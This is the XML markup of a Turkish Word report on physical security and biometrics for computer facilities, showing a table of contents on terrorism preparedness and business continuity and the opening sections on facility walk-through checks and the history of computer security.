                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3 Kurumunuz Potansiyel Bir Hedef midir?</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88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4</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89" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9. Terörist Amaçlara Örnekler</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89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4</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0" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10. Devlet kurumları</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0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5</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1" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>11. Paradigma Değişimi: Önleme Önleme</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1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6</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2" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12. Terörizm Riskini Azaltma</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2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17</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93" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.1 Fiziksel Güvenlik Değerlendirmeleri</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93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18</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4" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>13. Terörizm Olayı Prosedürleri Oluşturma</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4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23</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895" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.1 Bina Güvenliği Prosedürleri</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895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25</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6" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>14. 11 Eylül'den Alınan Dersler</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6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26</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7" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>15. İş Sürekliliği Planları</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7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27</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8" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16. Fiziksel Güvenlik Önlemleri</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8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27</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899" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>17. Şüpheli Patlayıcı Bir Aygıtın Keşfi</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899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30</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900" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>17.1 Tahliye</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900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32</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901" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>18. Genel Güvenlik Prosedürleri</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901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32</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902" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19. Kurtarma</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902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38</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903" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>19.1 Normal İşlemlere Devam Etme</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903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39</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904" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20. Dersler öğrenildi</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904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39</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996905" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>20.1 Önümüzdeki Çalışma</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7996905 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>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906" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>21. Sonuç</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906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40</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996907" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>22. Kaynakça</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7996907 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:r w:rsidRPr="00037933">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D"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rPr>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc7996866"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:bookmarkEnd w:id="178"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>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Bu bölüm, temel bilgisayar güvenliğinin iki temel unsurunu incelemektedir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iziksel güvenlik ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iyometri. Fiziksel güvenlik, kuruluşunuzun fiziksel bilgisayar tesislerini korur. Binaya, bilgisayar odalarına, bilgisayarlara (ana bilgisayar, mini ve mikro), manyetik ortama ve diğer ortamlara erişimi içerir. Biyometri cihazları fiziksel özellikleri (yani parmak izi, avuç içi baskısı, yüz özellikleri vb.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eya davranış özelliklerini (imza, yazma alışkanlıkları vb.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aydeder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1,2].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc7996867"/>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. FİZİKSEL GÜVENLİK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Herhangi bir kontrolün işyerine uygulanabilmesi için mevcut güvenlik seviyesinin değerlendirilmesi gerekir. Bu, birkaç yolla gerçekleştirilebilir. En kolay olanı “dolaşmak” tır. Mesai saatlerinden sonra tesisten yürüyüp beş kilit kontrolü kontrol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1. Ofis kapıları kilitlen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2. Masalar ve dolaplar kilitlen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3. İş istasyonları güvend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4. Disketler güvend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5. Şirket bilgileri güvence altına alınmış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beş kilit kontrol elemanının kontrol edilmesi, halihazırda bulunan kontrol seviyelerinin temel bir şekilde anlaşılmasını ve bir güvenlik kontrol sistemi uygulandığında iyileştirmelerin ölçülmesinde bir ölçüt sağlayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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ipik olarak, bu gözden geçirme neredeyse% 90 oranında bir kontrol eksikliği oranı gösterecektir. Yeni güvenlik kontrolleri yapıldıktan altı ila dokuz ay sonra ikinci bir inceleme yapılması önerilir.</w:t>
      </w:r>
      <w:bookmarkStart w:id="180" w:name="_Toc7996868"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>KISA BİR TARİHÇE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgisayar çağının başında, sistemleri korumak kolaydı; Laboratuarda kilitli kaldılar ve sadece birkaç seçilmiş “büyücüye” erişim sağlandı. Günümüzde bilgisayarlar daha ucuz, daha küçük ve neredeyse herkes için daha erişilebilir durumda.</w:t>
      </w:r>
    </w:p>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 xml:space="preserve">Yirminci yüzyılın ortalarında, anabilgisayar için dünya çapında </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pazar </w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilgisayar sistemleri patladı. Üçüncü nesil sistemler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1960'larda mevcut olan şirketler, bu sistemlere bağımlılıklarını anlamaya başladı. 1970'lerin ortalarından sonuna kadar, güvenlik endüstrisi yetişmeye başladı: Halon yangın söndürme sistemleri, kart erişimi ve RACF ve ACF2. Yüzyılın son çeyreğinde ana bilgisayar merkezli bilgi işlem doruktaydı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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1983'te, uygun fiyatlı taşınabilir bilgisayar, bilgi güvenliği uzmanları için çalışma alanını değiştirmeye başladı. Ana bilgisayardan masaüstüne bir göç başladı. Geçtiğimiz yirmi yılda bu kadar zor kazanılmış olan kontroller artık bürokrasinin nedeni olarak kabul edildi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1].</w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>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lastRenderedPageBreak/>
        <w:t>Artık masaüstlerinde fiziksel güvenlik gerekiyor. Yıllar boyunca, geleneksel düşünce bir bilgisayarın bir bilgisayar olduğu yönündedir.</w:t>
      </w:r>
    </w:p>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Denetimler, masaüstü veya iş istasyonu ortamında ana bilgisayar ortamından daha önemlidir.</w:t>
      </w:r>
    </w:p>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Bilgi işlem ortamı şimdi masaüstünden kullanıcıya geçiyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="009016DF"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Telekomünikasyonun kabul edilmesiyle, bir sonraki zorluk kullanıcı merkezli bilgi işlem ortamına fiziksel güvenlik çözümleri uygulamak olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Her masadaki bilgisayarlar ağlarla diğer yerel ağlara bağlıyken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve uzak sistemlerde, fiziksel güvenlik ihtiyaçları gözden geçirilmeli ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009016DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gerekli olan yerde yükseltildi. Bilgisayar ve iletişim güvenliğindeki gelişmeler yeterli değildir; Fiziksel güvenlik, genel bir bilgi güvenliği planının hayati öneme sahip bir bileşeni olmaya devam etmektedir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc7996869"/>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ODAK DİKKATİNE NEREDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
